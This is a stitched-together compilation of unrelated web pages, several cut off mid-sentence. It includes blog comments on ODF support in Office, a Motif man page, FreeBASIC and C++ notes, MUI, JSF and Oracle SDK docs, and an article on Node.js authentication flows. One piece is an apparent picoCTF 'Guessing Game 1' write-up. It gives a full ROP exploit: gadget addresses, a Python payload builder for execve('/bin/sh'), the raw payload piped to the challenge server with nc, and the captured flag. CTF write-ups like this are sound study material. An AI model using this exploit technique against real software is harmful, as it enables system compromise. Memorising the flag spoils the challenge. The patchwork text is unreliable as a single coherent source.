parseSomething(x) + parseSomething(y); } Then this can be revamped to this:: function A(z) { ... } function foo(x, y) { return A(x) + A(y); } var parseSomething=A; Not a big saving, but at least something.
http://www.peterbe.com/plog/private-functions-javascript
CC-MAIN-2015-06
en
refinedweb
For. PHPPowerPoint 0.1.0 was released last week, as an open-source PHP API for generating PPTX files, much Mitch, there is no “filter” involved – it’s built-in support. What made you think that it’s a filter? (I can’t find any place I’ve ever used that word regarding our ODF support, but would be glad to correct it if I have.) Also, your claim that docx is a proprietary format is hard for me to understand. There are many implementers who have written code to generate DOCX files by working directly with the ECMA376 spec – in what sense are the resulting DOCX files proprietary? Regarding your questions: - as we read the specification, tables in presentations are not allowed in ODF 1.1 – that was added in ODF 1.2, which is not yet an approved or published standard - the tables issue was pretty thoroughly debated a couple years ago during the DIS29500 process; Open XML has three table models, each optimized for a particular document type, and ODF uses a single table model across all document types - we store formulas in our own namespace; this is the only option available in any of the published versions of ODF. I will be writing about this in more detail in another post later this week. - the encryption approach used by our implementation of Open XML is documented at, and code samples are available at Your other comments seem to be more about OO’s plans than Office’s implementation, so I can’t add to those. Rob Weir posted on his blog a couple of days ago an Update on ODF Spreadsheet Interoperability .  @dmahugh: reference to Office 97 installer: "additional file format filters" if you think of a better shortcut term, please tell me :) ECMA376 relies upon but doesn't describe formats such as VML although they are declared 'deprecated', relies upon but doesn't describe paper sizes internal to MS Office (non-compliant with ISO paper sizes), relies upon non-standard leap years and date formats. Were it really open, it would have been accepted as-is by ISO, instead of being strongly edited (1,000 modifications required for 6,000 pages, published 8 months after it 'became a standard' instead of 6 weeks). And stop me if I'm wrong, but currently no Office version complies with ISO 29500:2008. About the rest of my comment, it was directed at Ian. About tables: yes, it was debated for DIS29500. However, I fail to see how ODF 1.1 can't accept tables in a presentation, as there are no differences between ODT, ODS, and ODP apart from the last letter: their XML manifests and contents are identical, so like a text document can include a table, so does a presentation - Impress couldn't add a table to an ODF 1.1 presentation but Kpresenter could, and so can OO.o 3, even when setting the ODF compliance to 1.0/1.1. ODF 1.1 thus supports tables in presentation documents. There is NO reason Powerpoint would scrap a table added to an ODF presentation, since the currently standardized format accepts it, except to artificially limit the export filter. It's not because an (now outdated) application didn't support that particular feature that it can't be done. Doug, I 100% agree to Rob that SP2 is a step BACKWARD on the road of interoperability. That's because it simply destroys the de facto interoperability that exists between all other suites - it creates spreadsheets that can be manipulated with MS Office ONLY. Of couse, OpenFormula is not an official standard yet, but why has Microsoft chosen to break this de facto alignement ? Hopefully, OpenFormula WILL BE an ISO standard in a few months. What then ? How will you explain that to European countries that are now fully commited to ODF in their public administrations ? On a short term, it will be good for Microsoft business & monopoly. But for medium & long term, it's suicidal. People - even non-technical - ARE INFORMED on your moves. We keep an eye on Microsoft... When I blogged about the release of SP2 with ODF support two weeks ago, I mentioned that I was planning
http://blogs.msdn.com/b/dmahugh/archive/2009/04/28/working-with-odf-in-word-2007-sp2.aspx?PageIndex=2
CC-MAIN-2015-06
en
refinedweb
xmgetpostedfromwidget(3) [redhat man page] XmGetPostedFromWidget(library call) XmGetPostedFromWidget(library call) NAME XmGetPostedFromWidget -- A RowColumn function that returns the widget from which a menu was posted SYNOPSIS #include <Xm/RowColumn.h> Widget XmGetPostedFromWidget( Widget menu);. menu Specifies the widget ID of the menu For a complete definition of RowColumn and its associated resources, see XmRowColumn(3). RETURN. RELATED XmRowColumn(3). XmGetPostedFromWidget(library call) XmAddToPostFromList(library call) XmAddToPostFromList(library call) NAME- up. menu). XmAddToPostFromList(library call)
https://www.unix.com/man-page/redhat/3/XmGetPostedFromWidget/
CC-MAIN-2021-43
en
refinedweb
FreeBASIC in style to Delphi's Extended Types. Some of the other features include namespaces, function overloading, Unicode support, variable and array initializers. FreeBASIC can create standalone executables, DLL's and libraries. GUI applications can be created using several GUI packages such as GTK and IUP, and by using the Windows API. Debugging support is provided with GDB or Insight. FreeBASIC has an extensive built-in graphics library that provides a number of graphic primitives, multi-buffer screen pages, direct access to the underlying screen pages, 8 to 32-bit color commands, BMP support, and OpenGL context creation. Portability FreeBASIC has
http://roguebasin.com/index.php/FreeBASIC
CC-MAIN-2021-43
en
refinedweb
4.3: Identifier Names - Page ID - 29031 Identifier Names Technical to Language An identifier is an arbitrarily long sequence of digits, underscores, lowercase and uppercase Latin letters, and most Unicode characters (see below for details). A valid identifier must begin with a non-digit character. Identifiers are case-sensitive (lowercase and uppercase letters are distinct), and every character is significant. There are certain rules that should be followed while naming c identifiers: - They must begin with a letter or underscore(_). - the identifiers with a double underscore anywhere are reserved; - the identifiers that begin with an underscore followed by an uppercase letter are reserved; - the identifiers that begin with an underscore are reserved in the global namespace. - They must consist of only letters, digits, or underscore. No other special character is allowed. - It should not be a keyword. - It must not contain white space. - It should be up to 31 characters long as only first 31 characters are significant. Some examples of C++ identifiers: These attributes are specific to C++ - the requirements - making sure you are coding according to the standards your organization has in place - CONSTANTS IN ALL UPPER CASE - not a requirements - but pretty much an industry standard concept Meaningful identifier names make your code easier for another to understand. After all what does "p" mean? Is it pi, price, pennies, etc. Thus do not use cryptic (look it up in the dictionary) identifier names. This has been discussed previously - you will lose points in my class if you use variables that are NOT meaningful. Some programming languages treat upper and lower case letters used in identifier names as the same. Be sure you know the coding requirements for whatever organization you are coding for. Definitions - reserved word - Words that cannot be used by the programmer as identifier names because they already have a specific meaning within the programming language. Adapted from: "C/C++ Tokens" by I.HARISH KUMAR, Geeks for Geeks "Identifiers" by Cubbi, cppreference.com "Identifier Names" by Kenneth Leroy Busbee, (Download for free at) is licensed under CC BY 4.0
https://eng.libretexts.org/Courses/Delta_College/C___Programming_I_(McClanahan)/04%3A_Data_and_Operators/4.03%3A_Identifier_Names
CC-MAIN-2021-43
en
refinedweb
ButtonBase API API documentation for the React ButtonBase component. Learn about the available props and the CSS API. Import You can learn about the difference by reading this guide on minimizing bundle size. import ButtonBase from '@mui/material/ButtonBase'; // or import { ButtonBase } from '@mui/material'; ButtonBase contains as few styles as possible. It aims to be a simple building block for creating a button. It contains a load of style reset and some focus/ripple logic. Component nameThe name MuiButton.
https://mui.com/api/button-base/
CC-MAIN-2021-43
en
refinedweb
Hacking Series Part 3 Challenge: Guessing Game 1 Category: binary exploitation We are given three files consisting of “vuln”, “vuln.c”, and “Makefile”. The binary vuln can be run and simulates a simple guessing game. From the source code given (vuln.c), we can see that if the correct number is guessed, the user can enter a name up to 360 characters long. We can also see that the buffer that stores this name is only 100 characters long, which means this program is vulnerable to a buffer overflow. The first thing to do is figure out a way to guess the “random” number successfully every time the program is run. In order to do this, I opened vuln in IDA to see if there are any patterns that appear to be manipulating the number that is used. In the function do_stuff, a function named get_random is called which is where the random number is produced. The result from get_random is stored in rdi, then is incremented by 1. Instead of following each instruction to figure out what number is produced in the end, I opened vuln in gdb and set a breakpoint after the function get_random is called. Then, I looked inside rax to determine the number and also ran the program multiple times to see if this number changed. It turns out that the number generated from get_random is always 83. This number does not change with multiple instances of the program, which means it is predictable. As stated before, this number is incremented by 1 then compared to the inputted guess of the user to see if they are correct. So in the end, the number that needs to be guessed is always 84 on the first try. Next, since we guessed the number correctly, the program asks for our name. Since we can preform a buffer overflow here, we will need to determine the correct amount of padding needed to overwrite rip. After several attempts, I determined that the amount of padding needed is 120 characters. After this number, we reach rip and can now work on exploiting the buffer. Since we have over 200 characters of space left, we can easily store shell code in the rest of the buffer, then execute from the stack. However, by looking at the contents of Makefile, I saw that this is not possible. The stack is non-executable. This means that this will need to a ROP based attack instead. In order to spawn a shell, I decided to call execve with /bin/sh as the program to run. In order to call execve with a syscall, the registers need to be in the following states: rax59 — the number for execve rdx0 — address to environment variables rsi0 — address to arguments rdiaddress of /bin/sh— path to program to execute After this, we can call syscall to get a shell on the system and find the flag. In order to get the registers in this state, we need to identify the following gadgets: pop rax ; ret pop rsi ; ret pop rdi ; ret pop rdx ; ret mov qword ptr [rsi], rax ; ret syscall There are mainly two stages to this ROP: the write stage and the execute stage. In the write stage, /bin/bash is stored in an empty data address in the binary so that it is easy to access later in the execute stage. This makes also makes the size of the shell code smaller. In the execute stage, the registers are set to the values they need to contain and execve is executed. Using ROPgadget, we can easily identify where these gadgets reside in the binary. Now that we know the address of each gadget, we can start writing instructions for the write stage. I did this in Python using some instructions provided by ROPgadget. Now, /bin/sh is stored in the address 0x00000000006ba160 after these instructions are executed (being a 64-bit binary). Next, we move on to the execute stage. This executes execve and gives us a shell when completed. Putting these two stages together, we get the following script. from struct import pack#write p = pack(‘<Q’, 0x4163f4) # pop rax ; ret p += b’/bin/sh\x00' p += pack(‘<Q’, 0x410ca3) # pop rsi ; ret p += pack(‘<Q’, 0x6ba160) # empty data address that I want /bin/sh to be in p += pack(‘<Q’, 0x47ff91) # mov qword ptr [rsi], rax ; ret#execute p += pack(‘<Q’, 0x400696) # pop rdi ; ret p += pack(‘<Q’, 0x6ba160) # empty data address that /bin/sh is in p += pack(‘<Q’, 0x410ca3) # pop rsi ; ret p += pack(‘<Q’, 0x0) # arguments p += pack(‘<Q’, 0x44a6b5) # pop rdx ; ret p += pack(‘<Q’, 0x0) # environment variables p += pack(‘<Q’, 0x4163f4) # pop rax ; ret ; pops 59 into rax p += pack(‘<Q’, 0x3b) # 59 p += pack(‘<Q’, 0x40137c) # syscallprint(p) This also prints the resulting shell code bytes so that they can be used in the payload to the server. The payload needs to include the number to guess, the padding, and the shell code. In order to return input back to the user to actually interact with the shell once it is spawned, we also need to include the cat command. The entire payload then needs to be piped to the server which we can connect to using netcat. In order to make sure the bytes are interpreted properly, we can use Python to print them. Python can also be used to print 84 (the number needed to be guessed) before the shell code is inserted. As a result, the payload looks like this. ( python -c ‘print(84)’ ; python -c ‘print(“a”*120+”\xf4cA\x00\x00\x00\x00\x00/bin/sh\x00\xa3\x0cA\x00\x00\x00\x00\x00`\xa1k\x00\x00\x00\x00\x00\x91\xffG\x00\x00\x00\x00\x00\x96\x06@\x00\x00\x00\x00\x00`\xa1k\x00\x00\x00\x00\x00\xa3\x0cA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb5\xa6D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf4cA\x00\x00\x00\x00\x00;\x00\x00\x00\x00\x00\x00\x00|\x13@\x00\x00\x00\x00\x00")’ ; cat ) | nc jupiter.challenges.picoctf.org 39940 After listing the files found on the server, I used cat to see the contents of flag.txt. I found the following flag. picoCTF{r0p_y0u_l1k3_4_hurr1c4n3_8cd37a0911d46b6b}
https://alisyakainth.medium.com/hacking-series-part-3-ba08e83989b6
CC-MAIN-2021-43
en
refinedweb
How can I get the name of a node used? I want to get its name by string How can I get the name of a node used? I want to get its name by string out of curiosity what do you plan on doing with this bit of information? Have you tried anything? The name is stored in the dyn, so t he simple route would be to read the file as a txt and parse the data you want from there. I do not want to write it manually as a string. My end goal is to export this data to excel. This will do it for DynamoRevit: import clr # Adding the DynamoRevitDS.dll module to work with the Dynamo API clr.AddReference('DynamoRevitDS') import Dynamo # access to the current Dynamo instance and workspace dynamoRevit = Dynamo.Applications.DynamoRevit() currentWorkspace = dynamoRevit.RevitDynamoModel.CurrentWorkspace nodeNames = [] for i in currentWorkspace.Nodes: nodeNames.append(i.Name) OUT = nodeNames Many thanks @john_pierson, I was looking for that and specifically get the name of nodes as input in the Python script, I mean get the name of the nodes feeded into the node script
https://forum.dynamobim.com/t/get-the-name-of-a-node/68019
CC-MAIN-2021-43
en
refinedweb
We ‘locale’ we can also use a class – which can give some control over the encoding and special characters in messages and/or where to retrieve the messages from (for example a database). The properties file in this case is extremely simple: title=The Interesting World of Internationalization formSubmit=Apply Changes if you like ageCategorySelector=Select Age Category()). The very simple JSF page looks like this: ... <f:view> <html> ... <body> <h:form> <h:panelgrid <h:outputtext <h:commandbutton </h:panelgrid> </h:form> </body> </html> </f:view> Note the references to i18n-ed messages using EL expressions of the format #{msg[‘key’]}iddling at all. The configuration of our managed beans – note there are two beans, one to implement Map and intercept the message request (MessageProvider) – we have hijacked the msg name for our MessageProvider, we should register the Resource Bundle itself under a different name. <application> <resource -bundle> <base -name>nl.amis.appBundle</base> <var>msgbundle</var> </resource> </application> The implementation of the MessageProvider class is very simple – it pass the request onwards to the MessageManager: package nl.amis; import java.util.HashMap; public class MessageProvider extends HashMap{ private MessageManager msgMgr; public MessageProvider() { } @Override public Object get(Object key) { return msgMgr.getMessage((String)key); } public void setMsgMgr(MessageManager msgMgr) { this.msgMgr = msgMgr; } public MessageManager getMsgMgr() { return msgMgr; } } The references in the JSF pages can all stay the same: it makes no difference whether the EL expression in the page references the Resource Bundle registered with JSF directly or a managed bean like we do here. Now for the MessageManager. The initial implementation that proves our interception mechanism works but does no manipulation looks like this: public class MessageManager { public String getMessage(String key) { // use standard JSF Resource Bundle mechanism return getMessageFromJSFBundle(key); // use the default Java ResourceBund;e mechanism // return getMessageFromResourceBundle(key); } private String getMessageFromResourceBundle(String key) { ResourceBundle bundle = null; String bundleName = "nl.amis.appBundle";; } private String getMessageFromJSFBundle(String key) { return (String)resolveExpression("#{msgbundle['" + key + "']}"); } public static ClassLoader getCurrentLoader(Object fallbackClass) { ClassLoader loader = Thread.currentThread().getContextClassLoader(); if (loader == null) loader = fallbackClass.getClass().getClassLoader(); return loader; } // from JSFUtils in Oracle ADF 11g Storefront Demo); } } We can choose between two ways to access the Resource Bundle. One is using the JSF mechanism directly – which will only work for Resource Bundles that are explicitly registered with JSF in faces-config.xml files. See method getMessageFromJSFBundle. The other one goes around whatever facilities JSF offers and uses the standard Java ResourceBundle library directly. With this approach, we have to find out the Locale ourselves. We can use this approach with any resource bundle file on the classpath, without them having been explicitly registered in faces-config.xml. This approach is used in getMessageFromResourceBundle(). Enter the Context that should influence the Resource Bundle results At this point the extra context enters the picture. For simplicity’s sake we will assume the context to be indicated by a property on a session scope managed bean. The context can be set using a List control in the user interface (typically this would be handled in a more subtle way). The MessageManager bean is extended with the ageCategory property and a getter and setter method. The JSF page is extended with the list control – that for some weird reason does not get its labels from the resource bundle: <h:selectonelistbox <f:selectitem <f:selectitem </h:selectonelistbox> Now we can set the context. Question is: what difference does it make? Or better yet: how can we have it make a difference? When the user toggles from Senior to Junior age category, what should be the effect on the text in the page? Basically there are two ways to handle this. One is to add additional keys to the resource bundle; these keys are composed of the original (base) key and an identification of the context in which the key applies. For example: title=The Interesting World of Internationalization formSubmit=Apply Changes if you like ageCategorySelector=Select Age Category title_senior=The never ending wonders of the World of Internationalization formSubmit_senior=Notify the application of your desires by pressing this button title_junior=Speaking your own language ageCategorySelector_junior=Pick your own age peer group Here is you like: junior_christmas_male_brandX_page1Title, christmas_male_brandX_page1Title, male_brandX_page1Title, brandX_page1Title, pageTitle1. Run the page; select Senior and press the button: Then select Junior and press the button: Resource Bundle per context value Instead of adding> <var>msgbundle</var> </resource> <resource -bundle> <base -name>nl.amis.appBundleJunior</base> <var>juniormsgbundle</var> </resource> <. Resources Download the JDeveloper 11g Application with the code for this article: jsfresourcebundletest.zip. 3 thoughts on “Context Sensitive Resource Bundle entries in JavaServer Faces applications – going beyond plain language, region & variant locales” Nice example. I have tried writing it twice and I still get Resource bundle is immutable. I there a way around that one? Thanks I re-wrote this program and I got the error: ResourceBundles are immutable Is there a way to fix this Thanks ceyesuma Excellent work! Another example of the importance of extensibility in the design of a standard. Stay tuned for JSF 2.0, please check for links to the latest specs and implementation! Ed Burns (jsf co spec lead)
https://technology.amis.nl/it/context-sensitive-resource-bundle-entries-in-javaserver-faces-applications-going-beyond-plain-language-region-variant-locales/
CC-MAIN-2021-43
en
refinedweb
public static class ImportCustomContentRequest.Builder extends Object implements BmcRequest.Builder<ImportCustomContentRequest,InputStream> clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait public ImportCustomContentRequest.Builder invocationCallback(Consumer<javax.ws.rs.client.Invocation.Builder> invocationCallback) Set the invocation callback for the request to be built. invocationCallback- the invocation callback to be set for the request public ImportCustomContentRequest.Builder retryConfiguration(RetryConfiguration retryConfiguration) Set the retry configuration for the request to be built. retryConfiguration- the retry configuration to be used for the request public ImportCustomContentRequest.Builder copy(ImportCustomContentRequest o) Copy method to populate the builder with values from the given instance. copyin interface BmcRequest.Builder<ImportCustomContentRequest,InputStream> o- other request from which to copy values public ImportCustomContentRequest build() Build the instance of ImportCustomCustomContentRequest,InputStream> public ImportCustomContentRequest.Builder body$(InputStream body) Alternative setter for the body parameter. body$in interface BmcRequest.Builder<ImportCustomContentRequest,InputStream> body- the body parameter public ImportCustomContentRequest.Builder namespaceName(String namespaceName) The Logging Analytics namespace used for the request. this. public ImportCustomContentRequest.Builder importCustomContentFileBody(InputStream importCustomContentFileBody) The file to upload which contains the custom content. this. public ImportCustomContentRequest.Builder isOverwrite(Boolean isOverwrite) A flag indicating whether or not to overwrite existing content if a conflict is found during import content operation. this. public ImportCustomContent ImportCustomContentRequest.Builder opcRequestId(String opcRequestId) The client request ID for tracing. this. public ImportCustomContentRequest buildWithoutInvocationCallback() public String toString() toStringin class Object
https://docs.oracle.com/en-us/iaas/tools/java/2.7.1/com/oracle/bmc/loganalytics/requests/ImportCustomContentRequest.Builder.html
CC-MAIN-2021-43
en
refinedweb
When you develop a web-application in Node.js®, you realize that the easiest way is to use Express. Express supports several plugins (such as session, etc.). However, if some pages in your application are secured and authentication is required - express gives you very little regarding authentication. And, if we are mentioning authentication, we should also point out that a user should be able to self-enroll (register). Similarly, if the user forgets his password, or wants to change it, the application should help him here as well. I call these flows: “authentication flows”. Every secured web application should support these flows unless it delegates the authentication to a third party (such as oAuth2.0), so we end up in the same code written again and again. If you develop several secured web apps, you may find yourself copy-pasting the code from one app to another. And, if you find a bug in your implementation, you have to fix it in all the applications. I thought of writing a package that can be reused, so any secured web applications can add this package as a dependency, and bam – all the flows mentioned above are implemented, with a minimal set of configurations. This way, developers can concentrate on developing the core of their app, instead of messing around with flows that are definitely not the core of their business. I call this module ‘authentication flows module’ or AFM in short. First off, I assume that the application uses something that is called “local strategy”, which means the application manages its own usernames and passwords. No oAuth, no cloud solutions like AWS Cognito, etc. Second, I assume that the hosting web-app is express-based. After the app initializes express (including body-parser and express-session), it passes it to the AFM, so AFM adds endpoints to it. Thus, the application supports all endpoints like /login, /createAccount, /forgotPassword, and so on. /createAccount Third, it is reasonable to assume that the application has its own UI – each app wants its pages to maintain the same look and feel, and this includes the login page, create account page, and so on. One application might use ejs, a second application may use simple HTML/CSS, and a third React, and so on. Thus, the AFM which implements the backend part must be totally decoupled from the UI. Fourth, the AFM sends emails to the user: verification emails, unlock account and restoration (forgot password) emails. Each application manages its own way of sending emails. Perhaps the hosting application sends emails in its logic, so it should reuse the same email server. In other cases, the hosting application might prefer to work with a specific provider like Google, mailgun or just an SMTP server like SMTP2GO. The AFM should be flexible enough to support all these cases. In these emails, a link is sent to the user. This link should expire after a pre-configured time and should be valid only once. Fifth, each application uses a different repository (or repositories). One approach could be that AFM will choose a repo implementation – mongoDB for instance - and store the data there. But the downside is that it forces all hosting applications to use mongoDB. What happens if some app does not want to or cannot use mongoDB? Therefore, the AFM should be flexible for different repositories implementations. Sixth, AFM will be as extensible as it can. It will expose endpoints to the hosting application so some parts can be extended. For example, if the hosting application allows emails (username) only from a specific domain, AFM will expose an API that can be implemented and executed during the create account flow. Security. Security. Security. The AFM stores user information (encoded credentials, etc.) with your data, in your storage solution. It accesses it using the repository layer with the API (interface). The hosting application decides which repo it uses, and it needs to use the implementation for the required repo. For example, if the hosting application uses SQL, it can use the existing implementation for SQL. If it uses a repo which does not currently have an implementation (such as CouchDB or Cassandra), it must implement the interface for that repo. A default in-memory implementation is supplied (mainly for testing). The easiest and most compact solution is to develop implementations for all reposin the AFM, but this solution would end up with a super heavy module, which is dependent on all clients of the repos. For example, to support SQL, elasticsearch and mongoDB, the AFM must include, in the package.json, the mongoDB client, SQL client, and so on. Another drawback is if we find a bug in one of the implementations, we have to issue a new version for the whole AFM with that fix. Our approach is to issue a separate module for each implementation. Thus, there would be a module for in-mem implementation, another for mongoDB, and so on. This way, the AFM itself is more robust and totally decoupled from the repo-implementation, it is more lightweight, and each implementation is independent of the others. Therefore, the hosting app will have to be dependent on AFM plus the repo-implementation that it uses. import { AuthenticationUser } from "../.."; export interface AuthenticationAccountRepository { loadUserByUsername(email: string): Promise<AuthenticationUser>; /** * Create a new user with the supplied details. */ createUser(authenticationUser: AuthenticationUser): void; /** * Remove the user with the given login name from the system. * @param email */ deleteUser(email: string): void; /** * Check if a user with the supplied login name exists in the system. */ userExists(username: string): Promise<boolean>; setEnabled(email: string); setDisabled(email: string); isEnabled(email: string): Promise<boolean>; // boolean changePassword(String username, String newEncodedPassword); /** * * @param email */ decrementAttemptsLeft(email: string); setAttemptsLeft(email: string, numAttemptsAllowed: number); /** * sets a password for a given user * @param email - the user's email * @param newPassword - new password to set */ setPassword(email: string, newPassword: string); getEncodedPassword(username: string): Promise<string>; getPasswordLastChangeDate(email: string): Promise<Date>; setAuthority(username: string, authority: string); // LINKS: addLink(username: string, link: string); /** * * @param username- the key in the map to whom the link is attached * @return true if link was found (and removed). false otherwise. */ removeLink(username: string): Promise<boolean>; getLink(username: string): Promise<{ link: string, date: Date }>; /** * @param link * @throws Error if link was not found for any user */ getUsernameByLink(link: string): Promise<string>; } After user registration, the AFM sends a verification email to the user. In other use-cases, if the user forgets his password, the AFM sends a link to the registered email, to verify it is him. In another use-case, the account is locked when the allowed number of login attempts is exceeded. There are many ways to send emails, and each application can choose its preferred way. nodemailer is a convenient way to send emails, but you need to configure a provider (Google, Microsoft, etc.). SMTP2GO is an example of a provider. Another email option is mailgun, which allows you to send email using their API (and not only SMTP). The AFM allows the hosting application to decide how it sends emails. By default, AFM uses nodemailer over SMTP2GO, but the hosting application can implement interface MailSender and have its own implementation for sending emails. It must be configured with the credentials of the hosting app (for example, SMTP2GO requires username/password, mailgun requires an APIKEY, and so on). MailSender APIKEY In the emails mentioned earlier, there are links that should be clicked. By clicking on an activation link, for example, the user confirms the registered email is valid. When the server responds to the link, it needs to know which user clicked it. One approach is to encrypt the username with the expiration date of the link, encode it and send it to user. But since the AFM ensures the link is used only once, it is stored in the DB. When the link is created, it is stored in the DB, and when it is used, it is removed. If the link is clicked again, the AFM will not find it in the repo and will throw an error. Another approach is to generate a UUID (AKA “token”) and send it to the user. This token is stored in the repo in the same record as the username, so there is no need to encrypt and encode (and so no need for private/public keys). When the user clicks the link, AFM searches for it in the repo, and finds who the user is. One way or another, AFM needs to store something in the repo. AFM uses the second approach and stores the generated token along with the time the link was created, to track expiration. This is stored in the users table. AFM is extensible using interceptor classes that can be extended. These methods are invoked by AFM at critical points of the flow. For example, class CreateAccountInterceptor can be extended and its methods can be overridden. Thus, method postCreateAccount can be implemented so it would be invoked by AFM after an account is created. CreateAccountInterceptor postCreateAccount The user completes the account creation form and clicks “Submit”. The server (AFM) verifies several things. For example, it validates that the email is valid, that the re-typed password matches the password, and that the password meets the password constraints (length, etc.). The hosting application can add more validations by extending the CreateAccountInterceptor` class. Note, that some validations can (and should) be checked by the UI, but the server should be protective in cases where the UI that hosts AFM is sloppy. CreateAccountInterceptor The password is hashed (sha-256) and encoded (base64). This is to ensure that the password that is stored in the DB cannot be revealed. Next, we check (in the DB ) whether the user (with the same email) already exists and is enabled. In this case, an error is thrown. Otherwise, a new user is created and stored in the DB and an email is sent to the user with a unique string. That string is stored in the DB in the same row/document/record as the user. The user receives the email to his inbox, and by clicking the link, he confirms that he created the account. If someone tries to create an account with someone else’s email, the link will not be clicked so the account will not be activated. When the user clicks the link, AFM removes this link from the DB (so it cannot be used again) and activates the account (by enabling it). style="height: 252px; width: 600px" data-src="/KB/Articles/5300920/extracted-image-2.png" class="lazyload" data-sizes="auto" data-> async createAccount(email: string, password: string, retypedPassword: string, firstName: string, lastName: string, serverPath: string) { //validate the input: AuthenticationFlowsProcessor.validateEmail(email); this.validatePassword(password); AuthenticationFlowsProcessor.validateRetypedPassword(password, retypedPassword); //encrypt the password: const encodedPassword: string = shaString(password); //make any other additional chackes. This let applications override this impl //and add their custom functionality: this.createAccountEndpoint.additionalValidations(email, password); debug('createAccount() for user ' + email); debug('encoded password: ' + encodedPassword); let authUser: AuthenticationUser = null; try { authUser = await this._authenticationAccountRepository.loadUserByUsername( email ); } catch(unfe) { //basically do nothing - we expect user not to be found. } debug(`oauthUser: ${authUser}`); //if user exists, but is not activated - we allow re-registration: if(authUser) { if( !authUser.isEnabled()) { await this._authenticationAccountRepository.deleteUser( email ); } else { //error - user already exists and active //log.error( "cannot create account - user " + email + " already exist." ); debug( "cannot create account - user " + email + " already exist." ); throw new AuthenticationFlowsError( USER_ALREADY_EXIST ); } } const authorities: string[] = this.setAuthorities(); //set authorities authUser = new AuthenticationUserImpl( false, //start as de-activated this._authenticationPolicyRepository. getDefaultAuthenticationPolicy().getMaxPasswordEntryAttempts(), null, //set by the repo-impl authorities); debug(`authUser: ${authUser}`); await this._authenticationAccountRepository.createUser(authUser); await this.createAccountEndpoint.postCreateAccount( email ); const token: string = randomString(); const activationUrl: string = serverPath + ACTIVATE_ACCOUNT_ENDPOINT + "/" + token; //persist the "uts", so this activation link will be single-used: await this._authenticationAccountRepository.addLink( email, token ); debug("sending registration email to " + email + "; activationUrl: " + activationUrl); await this._mailSender.sendEmail(email, AUTHENTICATION_MAIL_SUBJECT, activationUrl ); } The user enters their email in the forgot password form, and clicks Submit. The server (AFM) verifies the account exists and is not locked. If it is locked, AFM throws an error. Otherwise, an email is sent to the user with a token. That token is stored in the DB in the same row/document/record of the user. The user receives the email to their inbox, and by clicking the link confirms that they issued the “forgot password” flow (to avoid malicious party from resetting the password of another account). When the user clicks the link (that contains the token), the AFM checks the token (existence and expiration). If good, it redirects the user to “set new password” page. Note, we do not remove this token from the DB yet. The user completes the “set new password” form, and clicks Submit. As in “create account” flow, the server (AFM) validates that the re-typed password matches the password, verifies that the password meets the password constraints (length, etc.), and then stores the new password (hashed and encoded) in the DB, and removes the token. length style="height: 320px; width: 600px" data-src="/KB/Articles/5300920/extracted-image-3.png" class="lazyload" data-sizes="auto" data-> async forgotPassword(email: string, serverPath: string) { debug('forgotPassword() for user ' + email); AuthenticationFlowsProcessor.validateEmail(email); //if account is already locked, no need to ask the user the secret question: if( ! await this._authenticationAccountRepository.isEnabled(email) ) { //security note: Even if we don’t find an email address, we return 'ok'. //We don’t want untoward bots figuring out //what emails are real vs not real in our database. //throw new Error( ACCOUNT_LOCKED_OR_DOES_NOT_EXIST ); return; } await this.sendPasswordRestoreMail(email, serverPath); } An account locked when the user has exceeded the allowed number of login attempts. When that happens, the “enabled” flag is set to false, and a re-activation email is sent to the user. The flow is very similar to the account creation (see diagram). enabled false In change password flow, the user is already signed in, so AFM does not have to confirm the user’s identity by sending an email; nevertheless, security-wise, AFM sends an email to the user in this flow as well, to protect in the case where the user left their hosting application working and unguarded, and a malicious party tries to change the password. Therefore, the email is sent for confirmation but for notification as well. In previous versions (before 0.0.82) of AFM (and also in Java’s authentication-flows), it used cryptography in order to encrypt the user name with the expiration time of the link, so when the link is clicked, AFM decrypts it in the server and gets the username and expiration validation. Now, this is no longer needed, and AFM can send just a unique string as a token in the link, which is stored in the DB in relation to the username. When the link is clicked, AFM searches for the token in the DB and finds the username. There is a sample application that uses `authentication-flows-js` so it is a great place to start. Below there are the required configurations needed. According to the design, the hosting application chooses which repository it works with, and passes the appropriate adapters: const app = express(); var authFlows = require('authentication-flows-js'); const authFlowsES = require('authentication-flows-js-elasticsearch'); const esRepo = new authFlowsES.AuthenticationAccountElasticsearchRepository(); authFlows.config({ user_app: app, authenticationAccountRepository: repo, }); Currently, the following repositories are supported: This module *reuses* that client-app' express server and adds several endpoints to it (e.g., `/createAccount`). Thus, the client-app should pass authentication-flows-js its server object (example above). authentication-flows-js comes with a default set of configuration for the password policy (in /config/authentication-policy-repository-config.json). The hosting application can replace\edit the JSON file, and use its own preferred values. The password policy contains the following properties (with the following default values): { passwordMinLength: 6, passwordMaxLength: 10, passwordMinUpCaseChars: 1, passwordMinLoCaseChars: 1, passwordMinNumbericDigits: 1, passwordMinSpecialSymbols: 1, passwordBlackList: ["password", "123456"], maxPasswordEntryAttempts: 5, passwordLifeInDays: 60 } An example for a client-app can be found in the sample application, mentioned above. SMTP2GO Needless to say, tests are a critical part of any software development. During AFM development, it was important to ensure that working flows were not damaged as code is reused in several flows. There is a separate project for automated tests, based on Cucumber. Explaining Cucumber is out of scope here, but it is worth mentioning that all critical flows are tested – automatically. For example, account creation. There is a test that creates and account, activates it with the link, and then checks that the login works. Another test, for example, is account lock. The test creates an account, activates it, and then fails to login 5 times, until the account is locked. Then, the test re-activates the account using the link, and verifies that login works. All tests use the web API of the AFM. Thus, with each code change during development, all flows could be tested – in seconds – to avoid regressions. style="height: 211px; width: 600px" data-src="/KB/Articles/5300920/extracted-image-4.png" class="lazyload" data-sizes="auto" data-> style="height: 507px; width: 600px" data-src="/KB/Articles/5300920/extracted-image-5.png" class="lazyload" data-sizes="auto" data-> Many thanks to a dear friend, David Goldhar for helping me with the review.
https://codeproject.freetls.fastly.net/Articles/5300920/Password-Flows-Middleware-for-Express-based-Applic?pageflow=FixedWidth
CC-MAIN-2021-43
en
refinedweb